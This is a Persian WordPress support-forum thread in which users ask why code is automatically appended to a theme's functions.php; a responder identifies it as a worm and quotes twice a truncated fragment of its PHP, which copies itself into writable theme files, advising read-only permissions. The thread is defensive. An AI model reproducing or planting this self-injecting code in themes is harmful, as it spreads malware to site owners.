• اطلاعیه ها

    • Saeed Fard

      حمایت وردپرس پارسی از همایش آینده وب و موبایل   19/04/74

        چهارم و پنجم اسفند ماه 1395، همایش آیندهٔ وب و موبایل ایران با حمایت سازمان فناوری اطلاعات در مرکز همایش‌های شهید قندی برگزار خواهد شد. این همایش یک رویداد ۲ روزه است که در آن پیشتازان صنعت وب و موبایل از تکنولوژی‌های روز دنیا در این حوزه‌ها سخن می‌گویند به طوری که این همایش پنجره‌ای به چشم‌انداز آینده‌ٔ وب و موبایل در جهان، و همچنین راهنمایی برای تصمیم‌گیران، تصمیم‌سازان و متخصصان ایرانی است.   فرصت‌هایی که FOWM#  برای شما خلق خواهد کرد: آشنایی با تکنولوژی‌های آینده‌ساز وب و موبایل شرکت در مباحث چالشی درباره وب و موبایل ارتباط و شبکه‌سازی با “قله‌های وب و موبایل” موقعیت‌های کاری، هم‌تیمی‌های جدید دریافت گواهی شرکت در همایش دو روز به‌یادماندنی سرشار از شگفتی   شرکت‌کنندگان در این همایش ضمن آشنایی با فناوری‌های آینده‌ساز وب و موبایل، شرکت در مباحث چالشی و ارتباط با بزرگان وب و موبایل ایران، می‌توانند موقعیت‌های کاری و هم‌تیمی‌های جدید برای کسب‌وکار خود بیابند. این همایش برای طراحان و توسعه‌دهندگان وب‌سایت و موبایل، مدیران ارشد سازمان‌ها، صاحبان کسب‌وکارهای کوچک و متوسط، دانشجویان و علاقه‌مندان دارای نکات آموزشی و جذاب خواهد بود.   مجید علوی‌زاده، دبیر همایش آیندهٔ وب و موبایل که سابقه اجرای چند همایش و سمینار مرتبط را دارد، اعلام کرد: جمعی از بهترین‌ها و پیشروان این دو حوزه در ایران با ارائه‌های تخصصی خود، چشم‌انداز آینده این صنعت‌ها را به شرکت‌کنندگان عرضه خواهند کرد.   در هر یک از روزهای برگزاری همایش، یک پنل تخصصی در مورد یکی از موضوع‌های مهم این حوزه نیز برگزار خواهد شد و دست‌اندرکاران به بحث و تبادل نظر خواهند پرداخت و در پایان، به شرکت‌کنندگان گواهی حضور در همایش اعطا خواهد شد.   ثبت نام در مهمترین رویداد صنعت وب و موبایل ایران تا پایان بهمن ماه ۹۵ امکان پذیر خواهد بود، برای ثبت نام و یا کسب اطلاعات بیشتر در خصوص این رویداد و آشنایی با موضوعات و سخنرانان به آدرس http://conf.wsschool.org/fowm مراجعه نمایید.   کاربران وردپرس پارسی می‌توانند با استفاده از کد wp-parsi از مبلغ ۴۰ هزار تومان تخفیف در ثبت نام برخوردار شوند.
021

مشکل با اضافه شدن خودکار کدها در فایل functions.php

7 پست در این موضوع قرار دارد

سلام

وقتی پوسته وردپرس رو در حالتی که دیباگ فعاله انتخاب میکنم با اخطارهای زیر روبرو میشم :

11.jpg

البته قبلش فایل فاکنشن رو چک کردم چیزی به جز کدهایی که خودم بهش اضافه کرده بودم نبود ولی بعد از فعال کردن پوسته کدهای زیر به آخر فایل فانکشن به صورت اتوماتیک اضافه شد ... :

ggg.jpg

میخوام بدونم باید چیکار کنم که این کدها اتوماتیک به فانکشن اضافه نشن ...

ممنون

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

این کدها رو وردپرس اضافه میکنه

میتونید حذف کنید

و همچنین برای تکرار نشدن این مسئله permission نوشتن را از فایل بگیرید

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

ممنون آقا پارسا . راستش من میخوام قالبو بدم به یه نفر دیگه ... میخوام وقتی قالبو فعال میکنه این کدها اضافه نشن .. آیا میشه توی خود پوسته از کدی استفاده کرد که این کدها اتوماتیک لود نشن ؟؟

یه سوال دیگه هم داشتم :

بعضی وقتها که من تگها رو کپی میکنم و توی قالب میذارم مخصوصا تو header.php یه فاصله 26 پیکسلی به غیر از نوار مدیریت بالای هیدر سایت میافته ... باید چیکار کنم که این فاصله اضافه ایجاد نشه ؟

ویرایش شده در توسط 021

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

سلام

این کدها Worm هستند:


<?php
function _check_active_widget(){
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
$output=strip_tags($output, $allowed);
$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
if (is_array($direst)){
foreach ($direst as $item){
if (is_writable($item)){
$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
$cont=file_get_contents($item);
if (stripos($cont,$ftion) === false){
$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
$output .= $before . "Not found" . $after;
if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
.
.
.
.
$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
$posts=$wpdb->get_results($request);
$output="";
if ($posts) {
foreach ($posts as $post) {
$post_title=stripslashes($post->post_title);
$comment_count=$post->comment_count;
$permalink=get_permalink($post->ID);
$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
}
} else {
$output .= $before . "None found" . $after;
}
return $output;
}
?>

فایل functions.php شما دارای این Worm هست و روی حالت فقط خواندنی قرار بدید تا این کرم به فایل دسترسی نداشته باشه و همچنین برای فایل functions.php دیگر پوسته ها این سطح دسترسی را نیز حتماً رعایت کنید.

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

درست شد ممنون آقای حسینی ,

یه سوال دیگه هم داشتم:

بعضی وقتها که من تگها رو کپی میکنم و توی قالب میذارم مخصوصا تو header.php یه فاصله 26 پیکسلی به غیر از نوار مدیریت بالای هیدر سایت میافته ... باید چیکار کنم که این فاصله اضافه ایجاد نشه؟

یعنی ممکنه از کپی و پیس کردن تگها باشه ؟

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

یه سوال دیگه هم داشتم :

بعضی وقتها که من تگها رو کپی میکنم و توی قالب میذارم مخصوصا تو header.php یه فاصله 26 پیکسلی به غیر از نوار مدیریت بالای هیدر سایت میافته ... باید چیکار کنم که این فاصله اضافه ایجاد نشه ؟

وجود تابع فوتر:


<?php wp_footer(); ?>

قبل از بسته شدن تگ های body و html و تابع هدر :


<?php wp_head(); ?>

قبل از بسته شدن تگ head را چک کنید.

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

سلام

این کدها Worm هستند:


<?php
function _check_active_widget(){
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
$output=strip_tags($output, $allowed);
$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
if (is_array($direst)){
foreach ($direst as $item){
if (is_writable($item)){
$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
$cont=file_get_contents($item);
if (stripos($cont,$ftion) === false){
$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
$output .= $before . "Not found" . $after;
if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
.
.
.
.
$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
$posts=$wpdb->get_results($request);
$output="";
if ($posts) {
foreach ($posts as $post) {
$post_title=stripslashes($post->post_title);
$comment_count=$post->comment_count;
$permalink=get_permalink($post->ID);
$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
}
} else {
$output .= $before . "None found" . $after;
}
return $output;
}
?>

فایل functions.php شما دارای این Worm هست و روی حالت فقط خواندنی قرار بدید تا این کرم به فایل دسترسی نداشته باشه و همچنین برای فایل functions.php دیگر پوسته ها این سطح دسترسی را نیز حتماً رعایت کنید.

دوست عزیز از پاسخ بسیار دقیق و راهنمایی شما بسیار بسیار سپاسگزارم

راستش من هم دچار این مشکل بودم و اصلا نمی تونستم جلوی تکثیر این worm رو بگیرم و با راهنمایی شما این کار انجام شد

فقط می خوام بدونم آیا این کرم فایلهای دیگر رو هم دستکاری می کنه یا نه فقط فایل فانکشن رو تغییر میده؟؟؟؟؟

یه سوال دیگه هم اینکه این مشکل رو ریشه ای چطور می تونم حل کنم؟؟ یعنی خود worm رو پاکسازی کنم تا بعدا دوباره مشکلی ایجاد نشه؟؟؟؟

خیلی ممنون

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط zodiac
      سلام و خسته نباشید خدمت تمامی عزیزان
      من حدودا یه ماهی میشه که به جمع کاربران ورد پرس وارد شدم ولی مشکل جدی در پست گذاشتن به زبان فارسی دارم و وقتی که پست میزارم نام پست، متن پست، نام دسته به علامت سوال«؟» تبدیل میشه
      لطفا راهنمایی کنین که چجوری مشکل رو حل کنم
      زبان خوده وردپرس فارسی ـیه و مشکلی نداره
      البته در سایت به صورت تکه تکه نوشته شده است
      خیلی ممنون
      آدرس سایت: 
      ic.xzn.ir/zodiac
    • توسط zodiac
      سلام و خسته نباشید خدمت تمامی عزیزان
      من حدودا یه ماهی میشه که به جمع کاربران ورد پرس وارد شدم ولی مشکل جدی در پست گذاشتن به زبان فارسی دارم و وقتی که پست میزارم نام پست، متن پست، نام دسته به علامت سوال«؟» تبدیل میشه
      لطفا راهنمایی کنین که چجوری مشکل رو حل کنم
      زبان خوده وردپرس فارسی ـیه و مشکلی نداره
      البته در سایت به صورت تکه تکه نوشته شده است
      خیلی ممنون
      آدرس سایت: 
      ic.xzn.ir/zodiac
    • توسط 11057
      مشکل در نصب وردپرس روی دایرکت ادمین
      بعد نصب کردن ورد پرس سایت بالا نمیاد،این اخطار رو نشون میده:
       
      Not Found
      The requested URL / was not found on this server.
      Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
    • توسط runy

      سلام
      کد پست تایپ زیر را در فانشن گذاشتم .
      //---------------------— function wpp_custom_post_type() {     $labels = array(         'name'                => __( 'Post Types', 'text_domain' ),         'singular_name'       => __( 'Post Type', 'text_domain' ),         'menu_name'           => __( 'Post Type', 'text_domain' ),         'parent_item_colon'   => __( 'Parent Item:', 'text_domain' ),         'all_items'           => __( 'All Items', 'text_domain' ),         'view_item'           => __( 'View Item', 'text_domain' ),         'add_new_item'        => __( 'Add New Item', 'text_domain' ),         'add_new'             => __( 'Add New', 'text_domain' ),         'edit_item'           => __( 'Edit Item', 'text_domain' ),         'update_item'         => __( 'Update Item', 'text_domain' ),         'search_items'        => __( 'Search Item', 'text_domain' ),         'not_found'           => __( 'Not found', 'text_domain' ),         'not_found_in_trash'  => __( 'Not found in Trash', 'text_domain' ),     );     $rewrite = array(         'slug'                => 'post_type',         'with_front'          => true,         'pages'               => true,         'feeds'               => true,     );     $capabilities = array(         'edit_post'           => 'edit_post',         'read_post'           => 'read_post',         'delete_post'         => 'delete_post',         'edit_posts'          => 'edit_posts',         'edit_others_posts'   => 'edit_others_posts',         'publish_posts'       => 'publish_posts',         'read_private_posts'  => 'read_private_posts',     );     $args = array(         'label'               => __( 'post_type', 'text_domain' ),         'description'         => __( 'Post Type Description', 'text_domain' ),         'labels'              => $labels,         'supports'            => array( 'title', 'editor', 'excerpt', 'author', 'thumbnail', 'comments', 'trackbacks', 'revisions', 'custom-fields', 'page-attributes', 'post-formats', ),         'taxonomies'          => array( 'category', 'post_tag' ),         'hierarchical'        => false,         'public'              => true,         'show_ui'             => true,         'show_in_menu'        => true,         'show_in_nav_menus'   => true,         'show_in_admin_bar'   => true,         'menu_position'       => 5,         'menu_icon'           => 'dashicons-welcome-learn-more',         'can_export'          => true,         'has_archive'         => true,         'exclude_from_search' => false,         'publicly_queryable'  => true,         'query_var'           => 'post_type',         'rewrite'             => $rewrite,         'capabilities'        => $capabilities,     );     register_post_type( 'post_type', $args ); } add_action( 'init', 'wpp_custom_post_type', 0 ); //------------ ولی نمیتونه پست ها را نمایش بده .
      مشکل دومش اینکه حتی تو لیست خودش توی پیشخوان هم نمیتونه نمایش بده .

      مشکل کجاست  ؟؟
    • توسط mohsen8390
      با عرض سلام و خسته نباشید
      ببخشید یه مشکل با افزونه visual composer داشتم
      وقتی که بلاک متن برای قسمتی درست می کنم بعد از اتمام کار و ذخیره بلاک ها نمایش داده نمی شوند
      بعضی از دوستان گفتم کش مرورگر پاک کنی درست میشه ولی درست نشد
      ممنون میشم اگه کمکم کنید خیلی لازم دارم
      این موقعه ایی که تغییر میدم و ذخیره می کنم

       
      و این هم بعد از ذخیره